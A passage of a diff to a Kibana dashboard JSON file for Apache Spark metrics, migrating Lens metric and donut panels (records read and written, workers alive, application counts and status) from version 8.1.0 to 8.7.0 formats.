"operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.executor.bytes.written" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "f4140b61-62cd-4abe-a34e-bb7a1d14fefb", + "key": "apache_spark.executor.bytes.written", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": 
"apache_spark.executor.bytes.written" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "55aa8a79-a965-4ad3-bd75-1182fc29570e", + "layerId": "5d66805e-b15a-4a65-b914-128afac75b09", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } + }, + "title": "Number of Bytes Written [Metrics Apache Spark]", + "visualizationType": "lnsLegacyMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5d66805e-b15a-4a65-b914-128afac75b09", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f4140b61-62cd-4abe-a34e-bb7a1d14fefb", + "type": "index-pattern" + } + ] + }, + "type": "lens" + } + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2", + "w": 7, + "x": 41, + "y": 23 + }, + "panelIndex": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-d4698267-4169-47b1-81cd-17bd8621879f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "171181c8-0b9a-4664-85cb-0e8b82132b7a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6ffc819a-ab7a-43bd-aa18-dbd327428425", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "d4698267-4169-47b1-81cd-17bd8621879f": { + "columnOrder": [ + "f718a530-bd5f-4e8e-8960-ffac1ce48483" + ], + "columns": { + "f718a530-bd5f-4e8e-8960-ffac1ce48483": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Waiting Applications", + "operationType": "last_value", + "params": { + "sortField": 
"@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.node.main.applications.waiting" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "171181c8-0b9a-4664-85cb-0e8b82132b7a", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.node" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2", - "w": 7, - "x": 41, - "y": 23 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.node" + } + } }, - "panelIndex": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2", - "title": "Number of Applications waiting [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "6ffc819a-ab7a-43bd-aa18-dbd327428425", + "key": "apache_spark.node.main.applications.waiting", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.node.main.applications.waiting" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "f718a530-bd5f-4e8e-8960-ffac1ce48483", + "layerId": "d4698267-4169-47b1-81cd-17bd8621879f", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-aa4bc89a-1467-4370-980f-99b6e33890d7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "975bff6a-acfa-481f-86ba-7d697e207f65", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
"b889078f-52b4-4fdd-8fd5-6a636ff903a6", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "aa4bc89a-1467-4370-980f-99b6e33890d7": { - "columnOrder": [ - "f983c8f0-92bc-4d73-b8d4-f8d7c7851fb0" - ], - "columns": { - "f983c8f0-92bc-4d73-b8d4-f8d7c7851fb0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Records Read", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.executor.records.read" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "975bff6a-acfa-481f-86ba-7d697e207f65", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.executor" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.executor" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "b889078f-52b4-4fdd-8fd5-6a636ff903a6", - "key": "apache_spark.executor.records.read", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.executor.records.read" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "f983c8f0-92bc-4d73-b8d4-f8d7c7851fb0", - "layerId": "aa4bc89a-1467-4370-980f-99b6e33890d7", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of Applications waiting [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "75c23769-a2bd-4825-b20a-d140aeb36175", + "w": 8, + "x": 26, + "y": 28 + }, + 
"panelIndex": "75c23769-a2bd-4825-b20a-d140aeb36175", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-aa4bc89a-1467-4370-980f-99b6e33890d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "975bff6a-acfa-481f-86ba-7d697e207f65", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b889078f-52b4-4fdd-8fd5-6a636ff903a6", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "aa4bc89a-1467-4370-980f-99b6e33890d7": { + "columnOrder": [ + "f983c8f0-92bc-4d73-b8d4-f8d7c7851fb0" + ], + "columns": { + "f983c8f0-92bc-4d73-b8d4-f8d7c7851fb0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Records Read", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.executor.records.read" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "975bff6a-acfa-481f-86ba-7d697e207f65", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.executor" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "75c23769-a2bd-4825-b20a-d140aeb36175", - "w": 8, - "x": 26, - "y": 28 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.executor" + } + } }, - "panelIndex": "75c23769-a2bd-4825-b20a-d140aeb36175", - "title": "Number of Records Read [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "b889078f-52b4-4fdd-8fd5-6a636ff903a6", + "key": 
"apache_spark.executor.records.read", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.executor.records.read" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "f983c8f0-92bc-4d73-b8d4-f8d7c7851fb0", + "layerId": "aa4bc89a-1467-4370-980f-99b6e33890d7", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-de0d9a21-100f-4912-a985-ca42e4347241", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "cffd3ad8-723b-4694-bf3e-9d8a826ce05e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a3034e1f-cb79-4ef6-91f1-ff8b1f2510c8", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "de0d9a21-100f-4912-a985-ca42e4347241": { - "columnOrder": [ - "b14cce00-3621-4cc5-b9c9-75f22b038c77" - ], - "columns": { - "b14cce00-3621-4cc5-b9c9-75f22b038c77": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Records Written", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.executor.records.written" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "cffd3ad8-723b-4694-bf3e-9d8a826ce05e", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.executor" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.executor" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": 
null, - "disabled": false, - "index": "a3034e1f-cb79-4ef6-91f1-ff8b1f2510c8", - "key": "apache_spark.executor.records.written", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.executor.records.written" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "b14cce00-3621-4cc5-b9c9-75f22b038c77", - "layerId": "de0d9a21-100f-4912-a985-ca42e4347241", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of Records Read [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "ab9316b5-5728-4b03-aadb-a93e22da9257", + "w": 7, + "x": 34, + "y": 28 + }, + "panelIndex": "ab9316b5-5728-4b03-aadb-a93e22da9257", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-de0d9a21-100f-4912-a985-ca42e4347241", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "cffd3ad8-723b-4694-bf3e-9d8a826ce05e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a3034e1f-cb79-4ef6-91f1-ff8b1f2510c8", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "de0d9a21-100f-4912-a985-ca42e4347241": { + "columnOrder": [ + "b14cce00-3621-4cc5-b9c9-75f22b038c77" + ], + "columns": { + "b14cce00-3621-4cc5-b9c9-75f22b038c77": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Records Written", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": 
"apache_spark.executor.records.written" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "cffd3ad8-723b-4694-bf3e-9d8a826ce05e", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.executor" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "ab9316b5-5728-4b03-aadb-a93e22da9257", - "w": 7, - "x": 34, - "y": 28 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.executor" + } + } }, - "panelIndex": "ab9316b5-5728-4b03-aadb-a93e22da9257", - "title": "Number of Records Written [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "a3034e1f-cb79-4ef6-91f1-ff8b1f2510c8", + "key": "apache_spark.executor.records.written", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.executor.records.written" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b14cce00-3621-4cc5-b9c9-75f22b038c77", + "layerId": "de0d9a21-100f-4912-a985-ca42e4347241", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6fdd6b46-a1d0-470b-bf9a-527dc0444653", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "948085ee-3b01-4c26-8bb4-b3c40b02049d", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { 
- "layers": { - "6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6": { - "columnOrder": [ - "1a987909-acd1-47bf-a0ad-4c8c046399a3" - ], - "columns": { - "1a987909-acd1-47bf-a0ad-4c8c046399a3": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total Applications", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.node.main.applications.count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "6fdd6b46-a1d0-470b-bf9a-527dc0444653", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.node" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "948085ee-3b01-4c26-8bb4-b3c40b02049d", - "key": "apache_spark.node.main.applications.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.node.main.applications.count" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "1a987909-acd1-47bf-a0ad-4c8c046399a3", - "layerId": "6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of Records Written [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad", + "w": 7, + "x": 41, + "y": 28 + }, + "panelIndex": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad", + "embeddableConfig": { + "attributes": { + "references": [ + { + 
"id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6fdd6b46-a1d0-470b-bf9a-527dc0444653", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "948085ee-3b01-4c26-8bb4-b3c40b02049d", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6": { + "columnOrder": [ + "1a987909-acd1-47bf-a0ad-4c8c046399a3" + ], + "columns": { + "1a987909-acd1-47bf-a0ad-4c8c046399a3": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Applications", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.node.main.applications.count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "6fdd6b46-a1d0-470b-bf9a-527dc0444653", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.node" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad", - "w": 7, - "x": 41, - "y": 28 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.node" + } + } }, - "panelIndex": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad", - "title": "Total number of Applications [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "948085ee-3b01-4c26-8bb4-b3c40b02049d", + "key": "apache_spark.node.main.applications.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + 
"exists": { + "field": "apache_spark.node.main.applications.count" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "1a987909-acd1-47bf-a0ad-4c8c046399a3", + "layerId": "6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-530fc85b-0ba7-4f65-862b-a303af533c19", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e76b86a5-b6ba-4537-a0d1-046096a9807d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d950973c-f5b8-4aae-857a-e8eccbecd2d6", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "530fc85b-0ba7-4f65-862b-a303af533c19": { - "columnOrder": [ - "759453c2-c093-4aed-8bb4-3e873849ff92" - ], - "columns": { - "759453c2-c093-4aed-8bb4-3e873849ff92": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Workers Alive", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.node.main.workers.alive" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "e76b86a5-b6ba-4537-a0d1-046096a9807d", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.node" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "d950973c-f5b8-4aae-857a-e8eccbecd2d6", - "key": 
"apache_spark.node.main.workers.alive", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.node.main.workers.alive" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "759453c2-c093-4aed-8bb4-3e873849ff92", - "layerId": "530fc85b-0ba7-4f65-862b-a303af533c19", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Total number of Applications [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "cfbdf185-1437-478f-a856-eedbe62d1de2", + "w": 8, + "x": 26, + "y": 33 + }, + "panelIndex": "cfbdf185-1437-478f-a856-eedbe62d1de2", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-530fc85b-0ba7-4f65-862b-a303af533c19", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e76b86a5-b6ba-4537-a0d1-046096a9807d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d950973c-f5b8-4aae-857a-e8eccbecd2d6", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "530fc85b-0ba7-4f65-862b-a303af533c19": { + "columnOrder": [ + "759453c2-c093-4aed-8bb4-3e873849ff92" + ], + "columns": { + "759453c2-c093-4aed-8bb4-3e873849ff92": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Workers Alive", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.node.main.workers.alive" + } + }, + "incompleteColumns": {} + } + } + } 
+ }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "e76b86a5-b6ba-4537-a0d1-046096a9807d", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.node" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 6, - "i": "cfbdf185-1437-478f-a856-eedbe62d1de2", - "w": 8, - "x": 26, - "y": 33 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.node" + } + } }, - "panelIndex": "cfbdf185-1437-478f-a856-eedbe62d1de2", - "title": "Number of Workers Alive [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "d950973c-f5b8-4aae-857a-e8eccbecd2d6", + "key": "apache_spark.node.main.workers.alive", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.node.main.workers.alive" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "759453c2-c093-4aed-8bb4-3e873849ff92", + "layerId": "530fc85b-0ba7-4f65-862b-a303af533c19", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-148ce684-6f54-430c-9b71-69989419abd4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c7bd1bca-ca54-4168-8ed5-2e45bd906d13", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "148ce684-6f54-430c-9b71-69989419abd4": { - "columnOrder": [ - "47b92b87-6745-4aa9-86cb-988e730f8db0", - "9baa45f5-7118-4b46-a1f7-9dde678df6f0" - ], - "columns": { - 
"47b92b87-6745-4aa9-86cb-988e730f8db0": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Application Source Status", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "9baa45f5-7118-4b46-a1f7-9dde678df6f0", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "apache_spark.application.status" - }, - "9baa45f5-7118-4b46-a1f7-9dde678df6f0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Application Name", - "operationType": "unique_count", - "scale": "ratio", - "sourceField": "apache_spark.application.name" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "c7bd1bca-ca54-4168-8ed5-2e45bd906d13", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.application" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.application" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "emptySizeRatio": 0.54, - "groups": [ - "47b92b87-6745-4aa9-86cb-988e730f8db0" - ], - "layerId": "148ce684-6f54-430c-9b71-69989419abd4", - "layerType": "data", - "legendDisplay": "show", - "metric": "9baa45f5-7118-4b46-a1f7-9dde678df6f0", - "nestedLegend": false, - "numberDisplay": "hidden" - } - ], - "shape": "donut" - } + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of Workers Alive [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "78e81e12-c659-4d89-a80d-14ec4e49368a", + "w": 14, + "x": 34, + "y": 
33 + }, + "panelIndex": "78e81e12-c659-4d89-a80d-14ec4e49368a", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-148ce684-6f54-430c-9b71-69989419abd4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c7bd1bca-ca54-4168-8ed5-2e45bd906d13", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "148ce684-6f54-430c-9b71-69989419abd4": { + "columnOrder": [ + "47b92b87-6745-4aa9-86cb-988e730f8db0", + "9baa45f5-7118-4b46-a1f7-9dde678df6f0" + ], + "columns": { + "47b92b87-6745-4aa9-86cb-988e730f8db0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Application Source Status", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "9baa45f5-7118-4b46-a1f7-9dde678df6f0", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "apache_spark.application.status" }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" + "9baa45f5-7118-4b46-a1f7-9dde678df6f0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Application Name", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "apache_spark.application.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "c7bd1bca-ca54-4168-8ed5-2e45bd906d13", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.application" }, - "enhancements": {}, - "vis": { - "legendOpen": true + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": 
"apache_spark.application" } - }, - "gridData": { - "h": 12, - "i": "78e81e12-c659-4d89-a80d-14ec4e49368a", - "w": 14, - "x": 34, - "y": 33 - }, - "panelIndex": "78e81e12-c659-4d89-a80d-14ec4e49368a", - "title": "Application Source Status [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "emptySizeRatio": 0.54, + "layerId": "148ce684-6f54-430c-9b71-69989419abd4", + "layerType": "data", + "legendDisplay": "show", + "nestedLegend": false, + "numberDisplay": "hidden", + "legendSize": "auto", + "primaryGroups": [ + "47b92b87-6745-4aa9-86cb-988e730f8db0" + ], + "metrics": [ + "9baa45f5-7118-4b46-a1f7-9dde678df6f0" + ] + } + ], + "shape": "donut" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-87763c10-0d2a-4ff0-afb1-4d261c6c52de", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7c76ed08-e31a-4d5a-a8a3-d6f7763d3c40", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fffcc31c-dfa7-4d03-baf5-d0c48357153f", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "87763c10-0d2a-4ff0-afb1-4d261c6c52de": { - "columnOrder": [ - "0c759a6f-eef3-4849-81bb-9482134df3c0" - ], - "columns": { - "0c759a6f-eef3-4849-81bb-9482134df3c0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Number of Cores Used", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.node.worker.cores.used" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": 
